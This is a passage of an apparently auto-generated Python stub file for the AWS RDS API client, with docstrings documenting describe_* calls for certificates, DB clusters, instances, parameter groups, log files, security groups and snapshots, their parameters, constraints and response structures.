Examples
This example lists up to 20 certificates for the specified certificate identifier.
Expected Output:
:example: response = client.describe_certificates(
CertificateIdentifier='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
:type CertificateIdentifier: string
:param CertificateIdentifier: The user-supplied certificate identifier. If this parameter is specified, information for only the identified certificate is returned. This parameter isn't case-sensitive.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type Filters: list
:param Filters: This parameter is not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker: An optional pagination token provided by a previous DescribeCertificates request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:rtype: dict
:return: {
'Certificates': [
{
'CertificateIdentifier': 'string',
'CertificateType': 'string',
'Thumbprint': 'string',
'ValidFrom': datetime(2015, 1, 1),
'ValidTill': datetime(2015, 1, 1),
'CertificateArn': 'string'
},
],
'Marker': 'string'
}
"""
pass
def describe_db_cluster_parameter_groups(DBClusterParameterGroupName=None, Filters=None, MaxRecords=None, Marker=None):
"""
Returns a list of DBClusterParameterGroup descriptions. If a DBClusterParameterGroupName parameter is specified, the list will contain only the description of the specified DB cluster parameter group.
For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
See also: AWS API Documentation
Examples
This example lists settings for the specified DB cluster parameter group.
Expected Output:
:example: response = client.describe_db_cluster_parameter_groups(
DBClusterParameterGroupName='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
:type DBClusterParameterGroupName: string
:param DBClusterParameterGroupName: The name of a specific DB cluster parameter group to return details for.
Constraints:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type Filters: list
:param Filters: This parameter is not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker: An optional pagination token provided by a previous DescribeDBClusterParameterGroups request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:rtype: dict
:return: {
'Marker': 'string',
'DBClusterParameterGroups': [
{
'DBClusterParameterGroupName': 'string',
'DBParameterGroupFamily': 'string',
'Description': 'string',
'DBClusterParameterGroupArn': 'string'
},
]
}
"""
pass
def describe_db_cluster_parameters(DBClusterParameterGroupName=None, Source=None, Filters=None, MaxRecords=None, Marker=None):
"""
Returns the detailed parameter list for a particular DB cluster parameter group.
For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
See also: AWS API Documentation
Examples
This example lists system parameters for the specified DB cluster parameter group.
Expected Output:
:example: response = client.describe_db_cluster_parameters(
DBClusterParameterGroupName='string',
Source='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
:type DBClusterParameterGroupName: string
:param DBClusterParameterGroupName: [REQUIRED]
The name of a specific DB cluster parameter group to return parameter details for.
Constraints:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type Source: string
:param Source: A value that indicates to return only parameters for a specific source. Parameter sources can be engine , service , or customer .
:type Filters: list
:param Filters: This parameter is not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker: An optional pagination token provided by a previous DescribeDBClusterParameters request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:rtype: dict
:return: {
'Parameters': [
{
'ParameterName': 'string',
'ParameterValue': 'string',
'Description': 'string',
'Source': 'string',
'ApplyType': 'string',
'DataType': 'string',
'AllowedValues': 'string',
'IsModifiable': True|False,
'MinimumEngineVersion': 'string',
'ApplyMethod': 'immediate'|'pending-reboot'
},
],
'Marker': 'string'
}
"""
pass
def describe_db_cluster_snapshot_attributes(DBClusterSnapshotIdentifier=None):
"""
Returns a list of DB cluster snapshot attribute names and values for a manual DB cluster snapshot.
When sharing snapshots with other AWS accounts, DescribeDBClusterSnapshotAttributes returns the restore attribute and a list of IDs for the AWS accounts that are authorized to copy or restore the manual DB cluster snapshot. If all is included in the list of values for the restore attribute, then the manual DB cluster snapshot is public and can be copied or restored by all AWS accounts.
To add or remove access for an AWS account to copy or restore a manual DB cluster snapshot, or to make the manual DB cluster snapshot public or private, use the ModifyDBClusterSnapshotAttribute API action.
See also: AWS API Documentation
Examples
This example lists attributes for the specified DB cluster snapshot.
Expected Output:
:example: response = client.describe_db_cluster_snapshot_attributes(
DBClusterSnapshotIdentifier='string'
)
:type DBClusterSnapshotIdentifier: string
:param DBClusterSnapshotIdentifier: [REQUIRED]
The identifier for the DB cluster snapshot to describe the attributes for.
:rtype: dict
:return: {
'DBClusterSnapshotAttributesResult': {
'DBClusterSnapshotIdentifier': 'string',
'DBClusterSnapshotAttributes': [
{
'AttributeName': 'string',
'AttributeValues': [
'string',
]
},
]
}
}
"""
pass
def describe_db_cluster_snapshots(DBClusterIdentifier=None, DBClusterSnapshotIdentifier=None, SnapshotType=None, Filters=None, MaxRecords=None, Marker=None, IncludeShared=None, IncludePublic=None):
"""
Returns information about DB cluster snapshots. This API action supports pagination.
For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
See also: AWS API Documentation
Examples
This example lists settings for the specified, manually-created cluster snapshot.
Expected Output:
:example: response = client.describe_db_cluster_snapshots(
DBClusterIdentifier='string',
DBClusterSnapshotIdentifier='string',
SnapshotType='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string',
IncludeShared=True|False,
IncludePublic=True|False
)
:type DBClusterIdentifier: string
:param DBClusterIdentifier: The ID of the DB cluster to retrieve the list of DB cluster snapshots for. This parameter cannot be used in conjunction with the DBClusterSnapshotIdentifier parameter. This parameter is not case-sensitive.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type DBClusterSnapshotIdentifier: string
:param DBClusterSnapshotIdentifier: A specific DB cluster snapshot identifier to describe. This parameter cannot be used in conjunction with the DBClusterIdentifier parameter. This value is stored as a lowercase string.
Constraints:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
If this identifier is for an automated snapshot, the SnapshotType parameter must also be specified.
:type SnapshotType: string
:param SnapshotType: The type of DB cluster snapshots to be returned. You can specify one of the following values:
automated - Return all DB cluster snapshots that have been automatically taken by Amazon RDS for my AWS account.
manual - Return all DB cluster snapshots that have been taken by my AWS account.
shared - Return all manual DB cluster snapshots that have been shared to my AWS account.
public - Return all DB cluster snapshots that have been marked as public.
If you don't specify a SnapshotType value, then both automated and manual DB cluster snapshots are returned. You can include shared DB cluster snapshots with these results by setting the IncludeShared parameter to true . You can include public DB cluster snapshots with these results by setting the IncludePublic parameter to true .
The IncludeShared and IncludePublic parameters don't apply for SnapshotType values of manual or automated . The IncludePublic parameter doesn't apply when SnapshotType is set to shared . The IncludeShared parameter doesn't apply when SnapshotType is set to public .
:type Filters: list
:param Filters: This parameter is not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker: An optional pagination token provided by a previous DescribeDBClusterSnapshots request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:type IncludeShared: boolean
:param IncludeShared: Set this value to true to include shared manual DB cluster snapshots from other AWS accounts that this AWS account has been given permission to copy or restore, otherwise set this value to false . The default is false .
You can give an AWS account permission to restore a manual DB cluster snapshot from another AWS account by the ModifyDBClusterSnapshotAttribute API action.
:type IncludePublic: boolean
:param IncludePublic: Set this value to true to include manual DB cluster snapshots that are public and can be copied or restored by any AWS account, otherwise set this value to false . The default is false . The default is false.
You can share a manual DB cluster snapshot as public by using the ModifyDBClusterSnapshotAttribute API action.
:rtype: dict
:return: {
'Marker': 'string',
'DBClusterSnapshots': [
{
'AvailabilityZones': [
'string',
],
'DBClusterSnapshotIdentifier': 'string',
'DBClusterIdentifier': 'string',
'SnapshotCreateTime': datetime(2015, 1, 1),
'Engine': 'string',
'AllocatedStorage': 123,
'Status': 'string',
'Port': 123,
'VpcId': 'string',
'ClusterCreateTime': datetime(2015, 1, 1),
'MasterUsername': 'string',
'EngineVersion': 'string',
'LicenseModel': 'string',
'SnapshotType': 'string',
'PercentProgress': 123,
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DBClusterSnapshotArn': 'string',
'SourceDBClusterSnapshotArn': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
},
]
}
:returns:
CreateDBClusterSnapshot
DeleteDBClusterSnapshot
"""
pass
def describe_db_clusters(DBClusterIdentifier=None, Filters=None, MaxRecords=None, Marker=None):
"""
Returns information about provisioned Aurora DB clusters. This API supports pagination.
For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
See also: AWS API Documentation
Examples
This example lists settings for the specified DB cluster.
Expected Output:
:example: response = client.describe_db_clusters(
DBClusterIdentifier='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
:type DBClusterIdentifier: string
:param DBClusterIdentifier: The user-supplied DB cluster identifier. If this parameter is specified, information from only the specific DB cluster is returned. This parameter isn't case-sensitive.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type Filters: list
:param Filters: A filter that specifies one or more DB clusters to describe.
Supported filters:
db-cluster-id - Accepts DB cluster identifiers and DB cluster Amazon Resource Names (ARNs). The results list will only include information about the DB clusters identified by these ARNs.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker: An optional pagination token provided by a previous DescribeDBClusters request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:rtype: dict
:return: {
'Marker': 'string',
'DBClusters': [
{
'AllocatedStorage': 123,
'AvailabilityZones': [
'string',
],
'BackupRetentionPeriod': 123,
'CharacterSetName': 'string',
'DatabaseName': 'string',
'DBClusterIdentifier': 'string',
'DBClusterParameterGroup': 'string',
'DBSubnetGroup': 'string',
'Status': 'string',
'PercentProgress': 'string',
'EarliestRestorableTime': datetime(2015, 1, 1),
'Endpoint': 'string',
'ReaderEndpoint': 'string',
'MultiAZ': True|False,
'Engine': 'string',
'EngineVersion': 'string',
'LatestRestorableTime': datetime(2015, 1, 1),
'Port': 123,
'MasterUsername': 'string',
'DBClusterOptionGroupMemberships': [
{
'DBClusterOptionGroupName': 'string',
'Status': 'string'
},
],
'PreferredBackupWindow': 'string',
'PreferredMaintenanceWindow': 'string',
'ReplicationSourceIdentifier': 'string',
'ReadReplicaIdentifiers': [
'string',
],
'DBClusterMembers': [
{
'DBInstanceIdentifier': 'string',
'IsClusterWriter': True|False,
'DBClusterParameterGroupStatus': 'string',
'PromotionTier': 123
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'HostedZoneId': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbClusterResourceId': 'string',
'DBClusterArn': 'string',
'AssociatedRoles': [
{
'RoleArn': 'string',
'Status': 'string'
},
],
'IAMDatabaseAuthenticationEnabled': True|False,
'ClusterCreateTime': datetime(2015, 1, 1)
},
]
}
:returns:
CreateDBCluster
DeleteDBCluster
FailoverDBCluster
ModifyDBCluster
RestoreDBClusterFromSnapshot
RestoreDBClusterToPointInTime
"""
pass
def describe_db_engine_versions(Engine=None, EngineVersion=None, DBParameterGroupFamily=None, Filters=None, MaxRecords=None, Marker=None, DefaultOnly=None, ListSupportedCharacterSets=None, ListSupportedTimezones=None):
"""
Returns a list of the available DB engines.
See also: AWS API Documentation
Examples
This example lists settings for the specified DB engine version.
Expected Output:
:example: response = client.describe_db_engine_versions(
Engine='string',
EngineVersion='string',
DBParameterGroupFamily='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string',
DefaultOnly=True|False,
ListSupportedCharacterSets=True|False,
ListSupportedTimezones=True|False
)
:type Engine: string
:param Engine: The database engine to return.
:type EngineVersion: string
:param EngineVersion: The database engine version to return.
Example: 5.1.49
:type DBParameterGroupFamily: string
:param DBParameterGroupFamily: The name of a specific DB parameter group family to return details for.
Constraints:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type Filters: list
:param Filters: Not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more than the MaxRecords value is available, a pagination token called a marker is included in the response so that the following results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker: An optional pagination token provided by a previous request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:type DefaultOnly: boolean
:param DefaultOnly: Indicates that only the default version of the specified engine or engine and major version combination is returned.
:type ListSupportedCharacterSets: boolean
:param ListSupportedCharacterSets: If this parameter is specified and the requested engine supports the CharacterSetName parameter for CreateDBInstance , the response includes a list of supported character sets for each engine version.
:type ListSupportedTimezones: boolean
:param ListSupportedTimezones: If this parameter is specified and the requested engine supports the TimeZone parameter for CreateDBInstance , the response includes a list of supported time zones for each engine version.
:rtype: dict
:return: {
'Marker': 'string',
'DBEngineVersions': [
{
'Engine': 'string',
'EngineVersion': 'string',
'DBParameterGroupFamily': 'string',
'DBEngineDescription': 'string',
'DBEngineVersionDescription': 'string',
'DefaultCharacterSet': {
'CharacterSetName': 'string',
'CharacterSetDescription': 'string'
},
'SupportedCharacterSets': [
{
'CharacterSetName': 'string',
'CharacterSetDescription': 'string'
},
],
'ValidUpgradeTarget': [
{
'Engine': 'string',
'EngineVersion': 'string',
'Description': 'string',
'AutoUpgrade': True|False,
'IsMajorVersionUpgrade': True|False
},
],
'SupportedTimezones': [
{
'TimezoneName': 'string'
},
]
},
]
}
"""
pass
def describe_db_instances(DBInstanceIdentifier=None, Filters=None, MaxRecords=None, Marker=None):
"""
Returns information about provisioned RDS instances. This API supports pagination.
See also: AWS API Documentation
Examples
This example lists settings for the specified DB instance.
Expected Output:
:example: response = client.describe_db_instances(
DBInstanceIdentifier='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
:type DBInstanceIdentifier: string
:param DBInstanceIdentifier: The user-supplied instance identifier. If this parameter is specified, information from only the specific DB instance is returned. This parameter isn't case-sensitive.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type Filters: list
:param Filters: A filter that specifies one or more DB instances to describe.
Supported filters:
db-cluster-id - Accepts DB cluster identifiers and DB cluster Amazon Resource Names (ARNs). The results list will only include information about the DB instances associated with the DB Clusters identified by these ARNs.
db-instance-id - Accepts DB instance identifiers and DB instance Amazon Resource Names (ARNs). The results list will only include information about the DB instances identified by these ARNs.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker: An optional pagination token provided by a previous DescribeDBInstances request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:rtype: dict
:return: {
'Marker': 'string',
'DBInstances': [
{
'DBInstanceIdentifier': 'string',
'DBInstanceClass': 'string',
'Engine': 'string',
'DBInstanceStatus': 'string',
'MasterUsername': 'string',
'DBName': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123,
'HostedZoneId': 'string'
},
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'PreferredBackupWindow': 'string',
'BackupRetentionPeriod': 123,
'DBSecurityGroups': [
{
'DBSecurityGroupName': 'string',
'Status': 'string'
},
],
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'DBParameterGroups': [
{
'DBParameterGroupName': 'string',
'ParameterApplyStatus': 'string'
},
],
'AvailabilityZone': 'string',
'DBSubnetGroup': {
'DBSubnetGroupName': 'string',
'DBSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
],
'DBSubnetGroupArn': 'string'
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'DBInstanceClass': 'string',
'AllocatedStorage': 123,
'MasterUserPassword': 'string',
'Port': 123,
'BackupRetentionPeriod': 123,
'MultiAZ': True|False,
'EngineVersion': 'string',
'LicenseModel': 'string',
'Iops': 123,
'DBInstanceIdentifier': 'string',
'StorageType': 'string',
'CACertificateIdentifier': 'string',
'DBSubnetGroupName': 'string'
},
'LatestRestorableTime': datetime(2015, 1, 1),
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'ReadReplicaSourceDBInstanceIdentifier': 'string',
'ReadReplicaDBInstanceIdentifiers': [
'string',
],
'ReadReplicaDBClusterIdentifiers': [
'string',
],
'LicenseModel': 'string',
'Iops': 123,
'OptionGroupMemberships': [
{
'OptionGroupName': 'string',
'Status': 'string'
},
],
'CharacterSetName': 'string',
'SecondaryAvailabilityZone': 'string',
'PubliclyAccessible': True|False,
'StatusInfos': [
{
'StatusType': 'string',
'Normal': True|False,
'Status': 'string',
'Message': 'string'
},
],
'StorageType': 'string',
'TdeCredentialArn': 'string',
'DbInstancePort': 123,
'DBClusterIdentifier': 'string',
'StorageEncrypted': True|False,
'KmsKeyId': 'string',
'DbiResourceId': 'string',
'CACertificateIdentifier': 'string',
'DomainMemberships': [
{
'Domain': 'string',
'Status': 'string',
'FQDN': 'string',
'IAMRoleName': 'string'
},
],
'CopyTagsToSnapshot': True|False,
'MonitoringInterval': 123,
'EnhancedMonitoringResourceArn': 'string',
'MonitoringRoleArn': 'string',
'PromotionTier': 123,
'DBInstanceArn': 'string',
'Timezone': 'string',
'IAMDatabaseAuthenticationEnabled': True|False
},
]
}
:returns:
CreateDBInstance
DeleteDBInstance
ModifyDBInstance
"""
pass
def describe_db_log_files(DBInstanceIdentifier=None, FilenameContains=None, FileLastWritten=None, FileSize=None, Filters=None, MaxRecords=None, Marker=None):
"""
Returns a list of DB log files for the DB instance.
See also: AWS API Documentation
Examples
This example lists matching log file names for the specified DB instance, file name pattern, last write date in POSIX time with milleseconds, and minimum file size.
Expected Output:
:example: response = client.describe_db_log_files(
DBInstanceIdentifier='string',
FilenameContains='string',
FileLastWritten=123,
FileSize=123,
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
:type DBInstanceIdentifier: string
:param DBInstanceIdentifier: [REQUIRED]
The customer-assigned name of the DB instance that contains the log files you want to list.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type FilenameContains: string
:param FilenameContains: Filters the available log files for log file names that contain the specified string.
:type FileLastWritten: integer
:param FileLastWritten: Filters the available log files for files written since the specified date, in POSIX timestamp format with milliseconds.
:type FileSize: integer
:param FileSize: Filters the available log files for files larger than the specified size.
:type Filters: list
:param Filters: This parameter is not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
:type Marker: string
:param Marker: The pagination token provided in the previous request. If this parameter is specified the response includes only records beyond the marker, up to MaxRecords.
:rtype: dict
:return: {
'DescribeDBLogFiles': [
{
'LogFileName': 'string',
'LastWritten': 123,
'Size': 123
},
],
'Marker': 'string'
}
"""
pass
def describe_db_parameter_groups(DBParameterGroupName=None, Filters=None, MaxRecords=None, Marker=None):
"""
Returns a list of DBParameterGroup descriptions. If a DBParameterGroupName is specified, the list will contain only the description of the specified DB parameter group.
See also: AWS API Documentation
Examples
This example lists information about the specified DB parameter group.
Expected Output:
:example: response = client.describe_db_parameter_groups(
DBParameterGroupName='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
:type DBParameterGroupName: string
:param DBParameterGroupName: The name of a specific DB parameter group to return details for.
Constraints:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type Filters: list
:param Filters: This parameter is not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker: An optional pagination token provided by a previous DescribeDBParameterGroups request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:rtype: dict
:return: {
'Marker': 'string',
'DBParameterGroups': [
{
'DBParameterGroupName': 'string',
'DBParameterGroupFamily': 'string',
'Description': 'string',
'DBParameterGroupArn': 'string'
},
]
}
"""
pass
def describe_db_parameters(DBParameterGroupName=None, Source=None, Filters=None, MaxRecords=None, Marker=None):
"""
Returns the detailed parameter list for a particular DB parameter group.
See also: AWS API Documentation
Examples
This example lists information for up to the first 20 system parameters for the specified DB parameter group.
Expected Output:
:example: response = client.describe_db_parameters(
DBParameterGroupName='string',
Source='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
:type DBParameterGroupName: string
:param DBParameterGroupName: [REQUIRED]
The name of a specific DB parameter group to return details for.
Constraints:
Must be 1 to 255 alphanumeric characters
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type Source: string
:param Source: The parameter types to return.
Default: All parameter types returned
Valid Values: user | system | engine-default
:type Filters: list
:param Filters: This parameter is not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker: An optional pagination token provided by a previous DescribeDBParameters request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:rtype: dict
:return: {
'Parameters': [
{
'ParameterName': 'string',
'ParameterValue': 'string',
'Description': 'string',
'Source': 'string',
'ApplyType': 'string',
'DataType': 'string',
'AllowedValues': 'string',
'IsModifiable': True|False,
'MinimumEngineVersion': 'string',
'ApplyMethod': 'immediate'|'pending-reboot'
},
],
'Marker': 'string'
}
"""
pass
def describe_db_security_groups(DBSecurityGroupName=None, Filters=None, MaxRecords=None, Marker=None):
"""
Returns a list of DBSecurityGroup descriptions. If a DBSecurityGroupName is specified, the list will contain only the descriptions of the specified DB security group.
See also: AWS API Documentation
Examples
This example lists settings for the specified security group.
Expected Output:
:example: response = client.describe_db_security_groups(
DBSecurityGroupName='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string'
)
:type DBSecurityGroupName: string
:param DBSecurityGroupName: The name of the DB security group to return details for.
:type Filters: list
:param Filters: This parameter is not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type MaxRecords: integer
:param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
Default: 100
Constraints: Minimum 20, maximum 100.
:type Marker: string
:param Marker: An optional pagination token provided by a previous DescribeDBSecurityGroups request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
:rtype: dict
:return: {
'Marker': 'string',
'DBSecurityGroups': [
{
'OwnerId': 'string',
'DBSecurityGroupName': 'string',
'DBSecurityGroupDescription': 'string',
'VpcId': 'string',
'EC2SecurityGroups': [
{
'Status': 'string',
'EC2SecurityGroupName': 'string',
'EC2SecurityGroupId': 'string',
'EC2SecurityGroupOwnerId': 'string'
},
],
'IPRanges': [
{
'Status': 'string',
'CIDRIP': 'string'
},
],
'DBSecurityGroupArn': 'string'
},
]
}
:returns:
DescribeDBSecurityGroups
AuthorizeDBSecurityGroupIngress
CreateDBSecurityGroup
RevokeDBSecurityGroupIngress
"""
pass
def describe_db_snapshot_attributes(DBSnapshotIdentifier=None):
"""
Returns a list of DB snapshot attribute names and values for a manual DB snapshot.
When sharing snapshots with other AWS accounts, DescribeDBSnapshotAttributes returns the restore attribute and a list of IDs for the AWS accounts that are authorized to copy or restore the manual DB snapshot. If all is included in the list of values for the restore attribute, then the manual DB snapshot is public and can be copied or restored by all AWS accounts.
To add or remove access for an AWS account to copy or restore a manual DB snapshot, or to make the manual DB snapshot public or private, use the ModifyDBSnapshotAttribute API action.
See also: AWS API Documentation
Examples
This example lists attributes for the specified DB snapshot.
Expected Output:
:example: response = client.describe_db_snapshot_attributes(
DBSnapshotIdentifier='string'
)
:type DBSnapshotIdentifier: string
:param DBSnapshotIdentifier: [REQUIRED]
The identifier for the DB snapshot to describe the attributes for.
:rtype: dict
:return: {
'DBSnapshotAttributesResult': {
'DBSnapshotIdentifier': 'string',
'DBSnapshotAttributes': [
{
'AttributeName': 'string',
'AttributeValues': [
'string',
]
},
]
}
}
"""
pass
def describe_db_snapshots(DBInstanceIdentifier=None, DBSnapshotIdentifier=None, SnapshotType=None, Filters=None, MaxRecords=None, Marker=None, IncludeShared=None, IncludePublic=None):
"""
Returns information about DB snapshots. This API action supports pagination.
See also: AWS API Documentation
Examples
This example lists all manually-created, shared snapshots for the specified DB instance.
Expected Output:
:example: response = client.describe_db_snapshots(
DBInstanceIdentifier='string',
DBSnapshotIdentifier='string',
SnapshotType='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
MaxRecords=123,
Marker='string',
IncludeShared=True|False,
IncludePublic=True|False
)
:type DBInstanceIdentifier: string
:param DBInstanceIdentifier: The ID of the DB instance to retrieve the list of DB snapshots for. This parameter cannot be used in conjunction with DBSnapshotIdentifier . This parameter is not case-sensitive.
Constraints:
Must contain from 1 to 63 alphanumeric characters or hyphens
First character must be a letter
Cannot end with a hyphen or contain two consecutive hyphens
:type DBSnapshotIdentifier: string
:param DBSnapshotIdentifier: A specific DB snapshot identifier to describe. This parameter cannot be used in conjunction with DBInstanceIdentifier . This value is stored as a lowercase string.
Constraints:
Must be 1 to 255 alphanumeric characters.
First character must be a letter.
Cannot end with a hyphen or contain two consecutive hyphens.
If this identifier is for an automated snapshot, the SnapshotType parameter must also be specified.
:type SnapshotType: string
:param SnapshotType: The type of snapshots to be returned. You can specify one of the following values:
automated - Return all DB snapshots that have been automatically taken by Amazon RDS for my AWS account.
manual - Return all DB snapshots that have been taken by my AWS account.
shared - Return all manual DB snapshots that have been shared to my AWS account.
public - Return all DB snapshots that have been marked as public.
If you don't specify a SnapshotType value, then both automated and manual snapshots are returned. Shared and public DB snapshots are not included in the returned results by default. You can include shared snapshots with these results by setting the IncludeShared parameter to true . You can include public snapshots with these results by setting the IncludePublic parameter to true .
The IncludeShared and IncludePublic parameters don't apply for SnapshotType values of manual or automated . The IncludePublic parameter doesn't apply when SnapshotType is set to shared . The IncludeShared parameter doesn't apply when SnapshotType is set to public .
:type Filters: list
:param Filters: This parameter is not currently supported.
(dict) --This type is not currently supported.
Name (string) -- [REQUIRED]This parameter is not currently supported.
Values (list) -- [REQUIRED]This parameter is not currently supported.
(string) --
:type MaxRecords: integer
